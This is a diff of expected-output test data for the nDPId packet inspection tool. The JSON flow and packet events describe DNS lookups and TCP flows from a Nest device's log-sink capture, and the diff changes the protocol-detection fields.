-00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":537,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1536716402828,"flow_last_seen":1536716406969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":14853,"flow_avg_l4_payload_len":209,"midstream":0,"ts_msec":1536716532444,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NestLogSink.Google","breed":"Acceptable","category":"Cloud"}}
-00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":537,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536716409847,"flow_last_seen":1536716412657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2259,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1536716532444,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NestLogSink.Google","breed":"Acceptable","category":"Cloud"}}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":537,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536716402804,"flow_last_seen":1536716407116,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1536716532444,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536716402804,"flow_last_seen":1536716407116,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1536716592513,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716409847,"flow_last_seen":1536716411997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536716411997,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":537,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1536714607530,"flow_last_seen":1536716407068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":4069,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1536716532444,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":537,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1536716402828,"flow_last_seen":1536716406969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":14853,"flow_avg_l4_payload_len":209,"midstream":0,"ts_msec":1536716532444,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":537,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536716409847,"flow_last_seen":1536716412657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2259,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1536716532444,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":537,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536716402804,"flow_last_seen":1536716407116,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1536716532444,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536716402804,"flow_last_seen":1536716407116,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1536716592513,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717427961,"flow_last_seen":1536717427961,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1536717427961,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1536717427961,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1536717427961,"pkt":"AJD7JidrGLQwJjRACABFAABEME8AAP8RJffAqPIPwKjyAc5xADUAMGWoTp4BAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="}
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717427961,"flow_last_seen":1536717427961,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1536717427961,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717427961,"flow_last_seen":1536717427961,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1536717427961,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1536717427984,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1536717427984,"pkt":"AJD7JidrGLQwJjRACABFAABEMFAAAP8RJfbAqPIPwKjyAc5xADUAMGWoTp4BAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1536717428084,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1536717428084,"pkt":"GLQwJjRAAJD7JidrCABFAABUzkdAAEARBu\/AqPIBwKjyDwA1znEAQGW0Tp6BgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":613,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1536717427961,"flow_last_seen":1536717428084,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1536717428084,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":613,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1536717427961,"flow_last_seen":1536717428084,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1536717428084,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717428089,"flow_last_seen":1536717428089,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1536717428089,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1536717428089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1536717428089,"pkt":"AJD7JidrGLQwJjRACABFAAAsMFEAAP8GGkzAqPIPI7yauvd0K1cJA0ANAAAAAGACEgCqTwAAAgQEgAAA"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1536717428146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1536717428146,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93SD5IA7CQNADmASbvBIIgAAAgQFjA=="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1536717428152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1536717428152,"pkt":"AJD7JidrGLQwJjRACABFAAAoMFIAAP8GGk\/AqPIPI7yauvd0K1cJA0AOg+SAPFAQEgC8pwAAAAAAAAAA"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717428089,"flow_last_seen":1536717430226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536717430226,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","ndpi": {"proto":"NestLogSink.Google","breed":"Acceptable","category":"Cloud"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717428089,"flow_last_seen":1536717430226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536717430226,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717450091,"flow_last_seen":1536717450091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1536717450091,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1536717450091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1536717450091,"pkt":"AJD7JidrGLQwJjRACABFAAAsMG8AAP8GYgnAqPIPI65S7fd1K1cJDrE1AAAAAGACEgCA9gAAAgQEgAAA"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1536717450156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1536717450156,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93XProMNCQ6xNmASaQPV8QAAAgQFtA=="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1536717450159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1536717450159,"pkt":"AJD7JidrGLQwJjRACABFAAAoMHAAAP8GYgzAqPIPI65S7fd1K1cJDrE2z66DDlAQEgBEsgAAAAAAAAAA"}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717450091,"flow_last_seen":1536717452328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536717452328,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","ndpi": {"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
-00663{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1536716407119,"flow_last_seen":1536717449999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3908,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1536717572608,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
-00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536717428089,"flow_last_seen":1536717431514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":9343,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1536717572608,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NestLogSink.Google","breed":"Acceptable","category":"Cloud"}}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":703,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1536717427961,"flow_last_seen":1536717450088,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1536717572608,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1536717427961,"flow_last_seen":1536717450088,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1536717632701,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717450091,"flow_last_seen":1536717452328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536717452328,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1536716407119,"flow_last_seen":1536717449999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3908,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1536717572608,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536717428089,"flow_last_seen":1536717431514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":9343,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1536717572608,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":703,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1536717427961,"flow_last_seen":1536717450088,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1536717572608,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1536717427961,"flow_last_seen":1536717450088,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1536717632701,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718052990,"flow_last_seen":1536718052990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1536718052990,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1536718052990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1536718052990,"pkt":"AJD7JidrGLQwJjRACABFAAAsMIsAAP8GYe3AqPIPI65S7fd2K1cJGivXAAAAAGACEgAGSAAAAgQEgAAA"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1536718053059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1536718053059,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93aQyd5SCRor2GASaQM+4wAAAgQFtA=="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1536718053062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1536718053062,"pkt":"AJD7JidrGLQwJjRACABFAAAoMIwAAP8GYfDAqPIPI65S7fd2K1cJGivYkMneU1AQEgCtowAAAAAAAAAA"}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718052990,"flow_last_seen":1536718055162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536718055162,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","ndpi": {"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
-00664{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":775,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1536717450091,"flow_last_seen":1536718053058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1536718175913,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
